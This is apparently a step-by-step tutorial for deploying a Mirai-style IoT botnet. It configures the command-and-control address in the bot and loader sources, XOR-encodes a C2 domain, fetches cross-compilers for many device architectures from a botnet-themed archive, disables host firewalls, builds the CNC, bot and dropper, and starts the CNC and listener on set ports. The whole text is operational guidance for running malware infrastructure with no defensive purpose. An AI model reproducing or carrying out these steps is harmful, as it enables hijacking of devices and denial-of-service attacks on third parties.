// TUT made by zxcr9999
// using ubuntu 20.04 for better

sudo apt-get update -y
sudo apt-get upgrade -y
sudo apt-get install gcc g++ python3 python3-pip electric-fence sudo git apache2 screen tftpd tftp xinetd zmap -y
sudo apt install libmicrohttpd-dev

sudo rm -rf /usr/local/go && \
cd /tmp && \
wget https://go.dev/dl/go1.21.0.linux-amd64.tar.gz && \
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz && \
echo 'export GOROOT=/usr/local/go' >> ~/.bashrc && \
echo 'export GOPATH=$HOME/go' >> ~/.bashrc && \
echo 'export PATH=$GOPATH/bin:$GOROOT/bin:$PATH' >> ~/.bashrc && \
source ~/.bashrc && \
go version
cd ~

// change ip
bot/util.c
dlr/main.c
loader/src/main.c
loader/src/headers/config.h

// added domain
drag file xor.c to ur vps and type command
gcc xor.c -o xor -std=c99
./xor string api.trumdvfb.com
and add TABLE_CNC_DOMAIN in table.c file
"botnet.yourdomain.com" is your domain, and it is connected to the IP to host the botnet

add_entry(TABLE_CNC_DOMAIN, "\xa2\xaf\xa2\xef\xb3\xa0\xbb\xaf\xa4\xb5\xf3\xf1\xf3\xf0\xef\xac\xad", 17);

number 17 will correspond to xor bytes

mkdir /etc/xcompile
cd /etc/xcompile

wget https://www.mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-i586.tar.bz2
wget https://www.mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-m68k.tar.bz2
wget https://www.mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-mips.tar.bz2
wget https://www.mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-mipsel.tar.bz2
wget https://www.mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-powerpc.tar.bz2
wget https://www.mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-sh4.tar.bz2
wget https://www.mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-sparc.tar.bz2
wget https://www.mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-armv4l.tar.bz2
wget https://www.mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-armv5l.tar.bz2
wget https://www.mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-armv6l.tar.bz2
wget https://www.mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-armv7l.tar.bz2
wget https://www.mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-x86_64.tar.bz2

tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2
tar -jxf cross-compiler-mips.tar.bz2
tar -jxf cross-compiler-mipsel.tar.bz2
tar -jxf cross-compiler-powerpc.tar.bz2
tar -jxf cross-compiler-sh4.tar.bz2
tar -jxf cross-compiler-sparc.tar.bz2
tar -jxf cross-compiler-armv4l.tar.bz2
tar -jxf cross-compiler-armv5l.tar.bz2
tar -jxf cross-compiler-armv6l.tar.bz2
tar -jxf cross-compiler-armv7l.tar.bz2
tar -jxf cross-compiler-x86_64.tar.bz2

rm -rf *.tar.*

mv cross-compiler-i586 i586
mv cross-compiler-m68k m68k
mv cross-compiler-mips mips
mv cross-compiler-mipsel mipsel
mv cross-compiler-powerpc powerpc
mv cross-compiler-sh4 sh4
mv cross-compiler-sparc sparc
mv cross-compiler-armv4l armv4l
mv cross-compiler-armv5l armv5l
mv cross-compiler-armv6l armv6l
mv cross-compiler-armv7l armv7l
mv cross-compiler-x86_64 x86_64


// Start building
sudo ufw disable
sudo ufw status
service firewalld stop
service iptables stop 
service nginx restart  
service mariadb stop

//build cnc. Dont worry about the warning
cd ~/
cd cnc/
bash build.sh

cd ~/
chmod 777 *
bash build.sh

cd ~/
chmod 777 *
bash dropper.sh

// How to start cnc and listen
cd cnc/
ulimit -n999999; ulimit -u999999; ulimit -e999999
screen -S screen ./cnc 47925 1337 750
screen -S Listen ./listen

Help: 47925 is bot port, 1337 is cnc port, 750 is thread (max threads is 750)